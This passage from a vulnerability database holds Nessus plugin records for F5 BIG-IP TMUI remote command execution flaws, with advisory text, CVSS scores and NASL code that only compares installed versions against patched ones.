version number.", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Appliance mode TMUI authenticated remote command execution vulnerability (K18132488)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22987", "CVE-2021-22988"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL18132488.NASL", "href": "https://www.tenable.com/plugins/nessus/147636", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K18132488.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147636);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\"CVE-2021-22987\", \"CVE-2021-22988\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n\n script_name(english:\"F5 Networks BIG-IP : Appliance mode TMUI authenticated remote command execution vulnerability (K18132488)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 /\n15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K18132488 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3 when running in Appliance mode, the Traffic\n Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated\n remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached\n End of Software Development (EoSD) are not evaluated. (CVE-2021-22987)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K18132488\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K18132488.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22988\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22987\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K18132488';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:55:20", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K70031188 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3, TMUI, also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22988)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : TMUI authenticated remote command execution vulnerability (K70031188)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22987", "CVE-2021-22988"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL70031188.NASL", "href": "https://www.tenable.com/plugins/nessus/147624", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K70031188.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147624);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\"CVE-2021-22987\", \"CVE-2021-22988\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI authenticated remote command execution vulnerability (K70031188)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 11.6.5.3 / 12.1.5.3 / 13.1.3.6 / 14.1.4 /\n15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K70031188 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, 12.1.x before 12.1.5.3, and 11.6.x before 11.6.5.3, TMUI, also referred to as the Configuration\n utility, has an authenticated remote command execution vulnerability in undisclosed pages. Note: Software\n versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22988)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K70031188\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K70031188.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22988\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-22987\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K70031188';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3','11.6.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-31T16:34:26", "description": "The Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.(CVE-2020-5902)\n\nImpact\n\nThis vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.\n\nNote : All information present on an infiltrated system should be considered compromised. This includes, but is not limited to, logs, configurations, credentials, and digital certificates.\n\nImportant : If your BIG-IP system has TMUI exposed to the Internet and it does not have a fixed version of software installed, there is a high probability that it has been compromised and you should follow your internal incident response procedures. Refer to the Indicatorsof compromise section.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : TMUI RCE vulnerability (K52145254)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL52145254.NASL", "href": "https://www.tenable.com/plugins/nessus/137918", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K52145254.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137918);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE vulnerability (K52145254)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility, has a Remote Code Execution (RCE) vulnerability\nin undisclosed pages.(CVE-2020-5902)\n\nImpact\n\nThis vulnerability allows for unauthenticated attackers, or\nauthenticated users, with network access to the Configuration utility,\nthrough the BIG-IP management port and/or self IPs, to execute\narbitrary system commands, create or delete files, disable services,\nand/or execute arbitrary Java code. This vulnerability may result in\ncomplete system compromise. The BIG-IP system in Appliance mode is\nalso vulnerable. This issue is not exposed on the data plane; only the\ncontrol plane is affected.\n\nNote : All information present on an infiltrated system should be\nconsidered compromised. This includes, but is not limited to, logs,\nconfigurations, credentials, and digital certificates.\n\nImportant : If your BIG-IP system has TMUI exposed to the Internet and\nit does not have a fixed version of software installed, there is a\nhigh probability that it has been compromised and you should follow\nyour internal incident response procedures. Refer to the Indicatorsof\ncompromise section.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K52145254.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"F5 BIG-IP Traffic Management User Interface File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K52145254\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.0.0\",\"15.1.0.4\",\"15.0.1.4\",\"14.1.2.6\",\"13.1.3.4\",\"12.1.5.2\",\"11.6.5.2\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"15.1.0\",\"15.0.0-15.0.1\",\"14.1.0-14.1.2\",\"13.1.0-13.1.3\",\"12.1.0-12.1.5\",\"11.6.1-11.6.5\");\nvmatrix[\"AVR\"][\"unaffected\"] = 